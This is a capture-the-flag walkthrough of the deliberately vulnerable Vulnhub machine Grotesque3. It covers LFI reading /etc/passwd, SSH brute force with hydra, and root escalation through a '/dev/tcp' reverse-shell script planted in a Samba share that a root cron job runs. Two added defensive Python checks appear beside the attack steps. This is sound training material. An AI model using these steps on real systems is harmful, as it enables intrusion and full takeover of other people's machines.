Grotesque3
Identify the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:11  1         60   Unknown vendor
192.168.56.100  08:00:27:a8:8b:04  1         60   PCS Systemtechnik GmbH
192.168.56.156  08:00:27:de:25:1a  1         60   PCS Systemtechnik GmbH
Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.156.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.156 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-26 22:34 EDT
Nmap scan report for bogon (192.168.56.156)
Host is up (0.0013s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:DE:25:1A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.48 seconds
The Nmap scan shows the target host has two open ports: 22 (ssh) and 80 (http).
Getting a shell
Visiting port 80 in the browser, the image on the returned page contains the hint "md5?"
Perhaps it means the directory wordlist needs to be MD5-hashed?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ for each in $(cat /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt); do echo $each | md5sum >> dirmd5.txt; done
Then strip the '-' that md5sum appends to each result line:
$ sed -i 's/-//' dirmd5.txt
Then remove the trailing whitespace:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ sed -e 's/[[:blank:]]\+$//' -i dirmd5.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ gobuster dir -u http://192.168.56.156 -w dirmd5.txt -x .php,.html,.txt,.sh,.js,.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.156
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                dirmd5.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,sh,js,bak,php,html
[+] Timeout:                 10s
===============================================================
2023/04/26 23:23:45 Starting gobuster in directory enumeration mode
===============================================================
/f66b22bf020334b04c7d0d3eb5010391.php (Status: 200) [Size: 0]
gobuster found a file.
But requesting that file returns an empty response, so let's fuzz it (fuzz testing) for a parameter name.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ wfuzz -c -u 'http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000017563:   200        27 L     40 W       1457 Ch     "purpose"
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ curl http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?purpose=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
freddie:x:1000:1000:freddie,,,:/home/freddie:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
Testing confirms that the target has a local file inclusion (LFI) vulnerability. The next goal is to get a shell; first, check whether an SSH private key file exists.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ curl http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?purpose=../../../../home/freddie/.ssh/id_rsa
Nothing is returned, which indicates that user freddie has no SSH private key file. Next, check whether remote file inclusion is possible.
Start http.server on Kali Linux, then visit in the browser:
http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?purpose=http://192.168.56.230:8000/test.txt
Testing shows the target is not vulnerable to remote file inclusion.
So let's see whether user freddie's SSH password can be cracked.
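The two probes above (traversal to /etc/passwd and a remote URL in the purpose parameter) are what a defender would want to spot in the Apache access log. As an added example that is not part of the original writeup, the Python below parses constructed combined-format log lines (sample data, not captured from the target) and flags parameter values that look like local or remote include attempts:

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache combined-log format (not taken from the target).
SAMPLE_LOG = """\
192.168.56.230 - - [26/Apr/2023:23:40:01 -0400] "GET /f66b22bf020334b04c7d0d3eb5010391.php?purpose=../../../../etc/passwd HTTP/1.1" 200 1457 "-" "curl/7.88.1"
192.168.56.230 - - [26/Apr/2023:23:41:10 -0400] "GET /f66b22bf020334b04c7d0d3eb5010391.php?purpose=http://192.168.56.230:8000/test.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.230 - - [26/Apr/2023:23:42:05 -0400] "GET /f66b22bf020334b04c7d0d3eb5010391.php?purpose=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1457 "-" "curl/7.88.1"
192.168.56.1 - - [26/Apr/2023:23:43:00 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.1 - - [26/Apr/2023:23:43:30 -0400] "GET /f66b22bf020334b04c7d0d3eb5010391.php?purpose=about HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status code of a combined-log entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_value(value: str) -> Optional[str]:
    """Return the kind of include probe a parameter value looks like, or None."""
    decoded = unquote(unquote(value))  # decode twice to catch %252e-style double encoding
    if re.search(r'(^|/)\.\.(/|$)', decoded) or decoded.startswith('/'):
        return 'local-file-inclusion'
    if re.match(r'^[a-z][a-z0-9+.-]*://', decoded, re.IGNORECASE):
        return 'remote-file-inclusion'
    return None

def scan_access_log(text: str) -> list:
    """Parse each log line and report query parameters whose values look like include probes."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m['target'])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({'ip': m['ip'], 'path': parts.path, 'param': name,
                                 'kind': kind, 'status': int(m['status'])})
    return findings

if __name__ == '__main__':
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 and a non-zero response size, as in the first sample line, is the case worth alerting on, since it suggests the include succeeded.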
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ hydra -l freddie -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.156 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
After running for 15 minutes it still had not found the password.
The password wordlist should instead be the MD5-hashed wordlist generated earlier.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ hydra -l freddie -P dirmd5.txt ssh://192.168.56.156
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-27 03:00:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 433752 login tries (l:1/p:433752), ~27110 tries per task
[DATA] attacking ssh://192.168.56.156:22/
[STATUS] 145.00 tries/min, 145 tries in 00:01h, 433610 to do in 49:51h, 13 active
[STATUS] 92.00 tries/min, 276 tries in 00:03h, 433479 to do in 78:32h, 13 active
[STATUS] 85.86 tries/min, 601 tries in 00:07h, 433154 to do in 84:06h, 13 active
[STATUS] 83.60 tries/min, 1254 tries in 00:15h, 432501 to do in 86:14h, 13 active
[22][ssh] host: 192.168.56.156   login: freddie   password: 61a4e3e60c063d1e472dd780f64e6cad
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-27 03:29:04
We have user freddie's password.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ ssh freddie@192.168.56.156 
The authenticity of host '192.168.56.156 (192.168.56.156)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.156' (ED25519) to the list of known hosts.
freddie@192.168.56.156's password: 
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
freddie@grotesque:~$ id
uid=1000(freddie) gid=1000(freddie) groups=1000(freddie),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
freddie@grotesque:~$ sudo -l
-bash: sudo: command not found
freddie@grotesque:~$ ls -alh
total 20K
drwxr-xr-x 4 freddie freddie 4.0K Apr 26 23:41 .
drwxr-xr-x 3 root    root    4.0K Dec 17  2020 ..
drwx------ 3 freddie freddie 4.0K Apr 26 23:41 .gnupg
drwx------ 2 freddie freddie 4.0K Jul 11  2021 .ssh
-r-x------ 1 freddie freddie   32 Jul 11  2021 user.txt
freddie@grotesque:~$ cat user.txt
35A7EB682E33E89606102A883596A880
Privilege escalation
pspy is a command-line tool that monitors Linux processes without root privileges. Upload pspy64 to the target's /tmp directory, make it executable, and run it.
One of the lines it shows reads:
2023/04/27 00:38:01 CMD: UID=0 PID=3858 | /bin/sh -c bash /smbshare/*
It seems root periodically executes the scripts under /smbshare. Use the ss command to look at the listening ports.
freddie@grotesque:/tmp$ ss -tunlp
Netid  State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
udp    UNCONN  0       0       0.0.0.0:68           0.0.0.0:*
udp    UNCONN  0       0       192.168.56.255:137   0.0.0.0:*
udp    UNCONN  0       0       192.168.56.156:137   0.0.0.0:*
udp    UNCONN  0       0       0.0.0.0:137          0.0.0.0:*
udp    UNCONN  0       0       192.168.56.255:138   0.0.0.0:*
udp    UNCONN  0       0       192.168.56.156:138   0.0.0.0:*
udp    UNCONN  0       0       0.0.0.0:138          0.0.0.0:*
tcp    LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
tcp    LISTEN  0       50      0.0.0.0:445          0.0.0.0:*
tcp    LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*
tcp    LISTEN  0       50      0.0.0.0:139          0.0.0.0:*
tcp    LISTEN  0       128     *:80                 *:*
tcp    LISTEN  0       50      [::]:445             [::]:*
tcp    LISTEN  0       50      [::]:139             [::]:*
We can see that the target does indeed run an SMB service (ports 139 and 445).
freddie@grotesque:/tmp$ smbclient -L 127.0.0.1
Unable to initialize messaging context
Enter WORKGROUP\freddie's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	grotesque       Disk      grotesque
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            GROTESQUE
freddie@grotesque:/tmp$ smbclient //127.0.0.1/grotesque
Unable to initialize messaging context
Enter WORKGROUP\freddie's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 11 09:24:27 2021
  ..                                  D        0  Sun Jul 11 09:20:30 2021

		1942736 blocks of size 1024. 674116 blocks available
smb: \>
So we can upload a shell script to the share above and wait for root's job to execute it.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ cat escalate.sh 
#!/bin/bash
bash -i >& /dev/tcp/192.168.56.230/6666 0>&1
freddie@grotesque:/tmp$ wget http://192.168.56.230:8000/escalate.sh
--2023-04-27 00:45:19--  http://192.168.56.230:8000/escalate.sh
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 57 [text/x-sh]
Saving to: ‘escalate.sh’

escalate.sh         100%[===========================>]      57  --.-KB/s    in 0s      

2023-04-27 00:45:19 (11.9 MB/s) - ‘escalate.sh’ saved [57/57]

freddie@grotesque:/tmp$ chmod +x escalate.sh 
freddie@grotesque:/tmp$ smbclient //127.0.0.1/grotesque
Unable to initialize messaging context
Enter WORKGROUP\freddie's password: 
Try "help" to get a list of possible commands.
smb: \> put escalate.sh 
putting file escalate.sh as \escalate.sh (0.4 kb/s) (average 0.4 kb/s)
smb: \> ls
  .                                   D        0  Thu Apr 27 00:46:08 2023
  ..                                  D        0  Sun Jul 11 09:20:30 2021
  escalate.sh                         A       57  Thu Apr 27 00:46:08 2023

		1942736 blocks of size 1024. 674112 blocks available
smb: \>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]
└─$ sudo nc -nlvp 6666 
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.156] 59614
bash: cannot set terminal process group (3986): Inappropriate ioctl for device
bash: no job control in this shell
root@grotesque:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@grotesque:~# cd /root
cd /root
root@grotesque:~# ls -alh
ls -alh
total 16K
drwx------  2 root root 4.0K Jul 11  2021 .
drwxr-xr-x 19 root root 4.0K Jul 11  2021 ..
-rw-------  1 root root   42 Jul 11  2021 .bash_history
-r-x------  1 root root   32 Jul 11  2021 root.txt
root@grotesque:~# cat root.txt
cat root.txt
5C42D6BB0EE9CE4CB7E7349652C45C4A
root@grotesque:~#
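The root cause of this escalation is a root job running bash over every file in a directory that an unprivileged user can write to through the Samba share. As an added defensive check (not part of the original writeup), the Python below audits such a directory and reports each reason it is unsafe to execute from; the directory and files it creates are constructed stand-ins for /smbshare, so it runs offline:

```python
import os
import stat
import tempfile
from pathlib import Path

def audit_privileged_script_dir(directory: str, trusted_uid: int = 0) -> dict:
    """Explain why running 'bash <directory>/*' from a root job would be unsafe.

    Returns {path: [reasons]} covering the directory and each regular file in it.
    A directory writable by anyone but the trusted uid lets that party drop a new
    script that root will run; a file with group/world write bits, or owned by
    someone else, can be edited into a payload."""
    findings = {}
    d = Path(directory)
    st = d.stat()
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f'directory owned by uid {st.st_uid}, not {trusted_uid}')
    if st.st_mode & stat.S_IWGRP:
        reasons.append('directory group-writable')
    if st.st_mode & stat.S_IWOTH:
        reasons.append('directory world-writable')
    if reasons:
        findings[str(d)] = reasons
    for f in sorted(d.iterdir()):
        if not f.is_file():
            continue
        fst = f.stat()
        freasons = []
        if fst.st_uid != trusted_uid:
            freasons.append(f'file owned by uid {fst.st_uid}, not {trusted_uid}')
        if fst.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            freasons.append('file group/world-writable')
        if freasons:
            findings[str(f)] = freasons
    return findings

def build_constructed_share() -> str:
    """Constructed stand-in for the /smbshare directory, not the target's real share."""
    share = tempfile.mkdtemp(prefix='smbshare-')
    os.chmod(share, 0o777)  # anyone may create files, as a writable Samba share allows
    for name, mode in (('escalate.sh', 0o666), ('backup.sh', 0o700)):
        path = Path(share) / name
        path.write_text('#!/bin/bash\necho placeholder\n')
        os.chmod(path, mode)
    return share

if __name__ == '__main__':
    share = build_constructed_share()
    for path, why in audit_privileged_script_dir(share).items():
        print(path, '->', '; '.join(why))
```

Running the same check against the real directory a scheduled job reads from, with the job's own uid as trusted_uid, turns the pspy observation into a repeatable configuration test.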
STRIVE FOR PROGRESS, NOT FOR PERFECTION